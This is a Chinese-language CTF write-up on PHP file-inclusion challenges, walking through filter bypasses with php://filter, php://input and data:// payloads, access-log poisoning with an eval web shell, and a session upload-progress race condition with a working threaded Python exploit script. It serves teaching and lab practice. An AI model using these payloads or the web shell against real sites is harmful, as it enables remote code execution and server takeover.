实现过滤功能,是每个代码段进行过滤编写,还是写一个过滤文件
- 每个须要过滤的地方,进行一次过滤的编写
- 每个须要过滤的地方,进行一次文件包罗调用过滤函数
- 配合文件上传进行getshell,图片带有脚本后门代码,包罗这个图片,脚本代码就被触发
- 配合日记文件进行getshell,日记会记载访问UA
- if(isset($_GET['file'])){
- $file = $_GET['file'];
- include($file);
- } else {
- highlight_file(__FILE__);
- }
file:// 用于访问本地文件体系,其格式为
file:// [文件的绝对路径和文件名]
php:// 访问各个输入/输出流(I/O streams),其基本格式为php://filter和php://input
php://filter用于读取源码。
我们可以以base64编码的方式读取指定文件的源码:如
- ?file=php://filter/read=convert.base64-encode/resource=flag.php
post传参 <?php phpinfo(); ?>
例题二
- <?php
- /*
- # -*- coding: utf-8 -*-
- # @Author: h1xa
- # @Date: 2020-09-16 10:52:43
- # @Last Modified by: h1xa
- # @Last Modified time: 2020-09-16 10:54:20
- # @email: h1xa@ctfer.com
- # @link: https://ctfer.com
- */
- if(isset($_GET['file'])){
- $file = $_GET['file'];
- include($file);
- }else{
- highlight_file(__FILE__);
- }
方法一:filter伪协议
- ?file=php://filter/read=convert.base64-encode/resource=flag.php
post传参
<?php phpinfo(); ?>
方法三:data协议
data:// 协议的格式为 data://[<MIME-type>][;charset=<encoding>][;base64],<data>,具体填写方式如下:
1. 基本结构
- <MIME-type>:指定命据的类型(如 text/plain、image/png 等)。若省略,默认为 text/plain。
- charset=<encoding>:可选,指定文本数据的字符编码(如 charset=UTF-8)。仅对文本类 MIME 类型有效。
- ;base64:可选,表现 <data> 部分为 Base64 编码格式。若省略,数据需直接明文填写。
- <data>:实际数据内容(明文或 Base64 编码后的字符串)。
- ?file=data://text/plain,<?php system('tac flag.php');?>
例题三
- if(isset($_GET['file'])){
- $file = $_GET['file'];
- $file = str_replace("php", "???", $file);
- include($file);
- }else{
- highlight_file(__FILE__);
- }
但是巨细写绕过对input和data协议有用,对filter协议没有用
方法同例题1
- ?file=data://text/plain,<?Php system('tac f*');?>
例题四
- <?php
- /*
- # -*- coding: utf-8 -*-
- # @Author: h1xa
- # @Date: 2020-09-16 11:25:09
- # @Last Modified by: h1xa
- # @Last Modified time: 2020-09-16 11:26:29
- # @email: h1xa@ctfer.com
- # @link: https://ctfer.com
- */
- if(isset($_GET['file'])){
- $file = $_GET['file'];
- $file = str_replace("php", "???", $file);
- $file = str_replace("data", "???", $file);
- include($file);
- }else{
- highlight_file(__FILE__);
- }
例题五
- <?php
- /*
- # -*- coding: utf-8 -*-
- # @Author: h1xa
- # @Date: 2020-09-16 11:25:09
- # @Last Modified by: h1xa
- # @Last Modified time: 2020-09-16 15:51:31
- # @email: h1xa@ctfer.com
- # @link: https://ctfer.com
- */
- if(isset($_GET['file'])){
- $file = $_GET['file'];
- $file = str_replace("php", "???", $file);
- $file = str_replace("data", "???", $file);
- $file = str_replace(":", "???", $file);
- include($file);
- }else{
- highlight_file(__FILE__);
- }
日记文件是服务器用来记载各种操作和访问信息的文件,好比网站服务器会记任命户的访问哀求、泉源地址、使用的浏览器信息等。如果攻击者能够在发送给网站的哀求(好比网址、用户代理信息等)中插入恶意代码,这些代码就会被服务器记载到日记文件中。当服务器后续读取或处理这些日记文件时,如果存在漏洞,恶意代码就可能被当作正常的代码执行,从而实现攻击目的,好比获取服务器的控制权(即“getshell”)。
确定服务器类型
在进行攻击之前,须要先判断目的网站使用的是哪种服务器软件,因为差别的服务器软件日记文件的存放位置和格式可能差别。
详细攻击步骤解析(利用PHP Session上传进度 + 条件竞争)
1. 漏洞背景
题目代码存在文件包罗漏洞,但过滤了php、data、:、.等关键字符,无法直接包罗恶意文件。需利用PHP的session.upload_progress机制和条件竞争绕过限制
2. 核心原理
- Apache服务器:它是一种常见的Web服务器软件,它的日记文件通常存放在/var/log/apache/access.log路径下。这个文件会记载网站的访问记载,包括用户哀求的网址、时间、状态码等信息。
- Nginx服务器:这也是另一种常用的Web服务器软件,它的日记文件一样平常存放在/var/log/nginx/access.log和/var/log/nginx/error.log路径下。access.log记载正常访问信息,error.log记载错误信息。
- 可见使用Nginx服务器
- ?file=/var/log/nginx/access.log
- <?php @eval($_REQUEST['cmd']);?>
例题六
- 过滤了冒号,伪协议不好用了,于是,这个题还是用web80的getshell方法,得到flag
- 例题七
- 该死的只能在十一点半后才能做,只能把电脑带回去了
web82 -86 都使用PHP_SESSION_UPLOAD_PROGRESS进行文件包罗
原理表明
- 文件上传进度监控开启该选项后,用户上传文件时可以通过 POST 哀求实时检察上传进度。
- Session 代码注入我们可以在服务器会话(session)中写入待执行的代码,使其在后续流程中被执行。
- 自定义 Session ID用户可以通过修改 Cookie(如 PHPSESSID=flag)自定义 Session ID,PHP 会据此在服务器上生成对应的 Session 文件(如 /tmp/sess_flag)。文件名中的 sess_ 前缀是固定的,但后续部分(如 flag)可由用户控制。
- Session 文件包罗执行要触发代码执行,需通过文件包罗(如 include)加载这个 Session 文件。
- 主动清算机制 默认设置下,PHP 的 session.upload_progress.cleanup 功能会在读取完全部 POST 数据后主动删除进度信息,导致注入的代码被扫除。
- 条件竞争利用
为了绕过清算机制,须要利用条件竞争(Race Condition):在体系主动清算前,争先完成文件包罗并执行代码。这种手法在文件上传漏洞利用中很常见,本质是“赶在体系删除前抢占执行权”
- Session上传进度机制
PHP在上传文件时,若启用session.upload_progress.enabled(默认开启),会在$_SESSION中记载上传进度,并生成临时Session文件(如/tmp/sess_< HPSESSID>)
用户可控Session ID
通过Cookie: PHPSESSID=evil
可指定Session文件名(如/tmp/sess_evil),并注入恶意代码到Session文件
- 条件竞争
默认session.upload_progress.cleanup=On会立即删除Session文件,需在删除前争先包罗该文件执行代码
3. 详细攻击步骤
步骤1:构造恶意Session文件
- 设置自定义Session ID
在哀求中注入Cookie,控制Session文件名:
PHP会生成文件:/tmp/sess_evil。
- 触发Session写入
通过上传表单的PHP_SESSION_UPLOAD_PROGRESS字段写入恶意代码:
- <form action="http://target.com/" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('cat /flag'); ?>" />
- <input type="file" name="file" />
- <input type="submit" />
- </form>
- upload_progress_<?php system('cat /flag'); ?>
步骤2:利用文件包罗漏洞
- 包罗Session文件
由于.被过滤,需直接包罗路径:
- GET /?file=/tmp/sess_evil
- 主动化竞争脚本
使用Python并发哀求:
- 线程1:持续上传文件,保持Session文件存在。
- 线程2:高频哀求/?file=/tmp/sess_evil,在文件删除前执行代码。
示例脚本:
- import requests
- import threading
- target = "http://target.com/"
- session = requests.Session()
- session.cookies.set("PHPSESSID", "evil")
- def upload():
- while True:
- files = {"file": ("test.txt", "data")}
- data = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /flag'); ?>"}
- session.post(target, files=files, data=data)
- def include():
- while True:
- r = session.get(f"{target}?file=/tmp/sess_evil")
- if "flag{" in r.text:
- print(r.text)
- break
- t1 = threading.Thread(target=upload)
- t2 = threading.Thread(target=include)
- t1.start()
- t2.start()
步骤3:绕过过滤
- 路径绕过
若/tmp/sess_evil被过滤,实验:
- GET /?file=/tmp/sess_evil
- /.
4. 关键点总结
- Session控制:通过PHPSESSID指定文件名,注入恶意代码。
- 竞争窗口:在PHP删除前包罗文件,需毫秒级并发哀求。
- 绕过过滤:直接路径包罗,制止使用被过滤字符
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
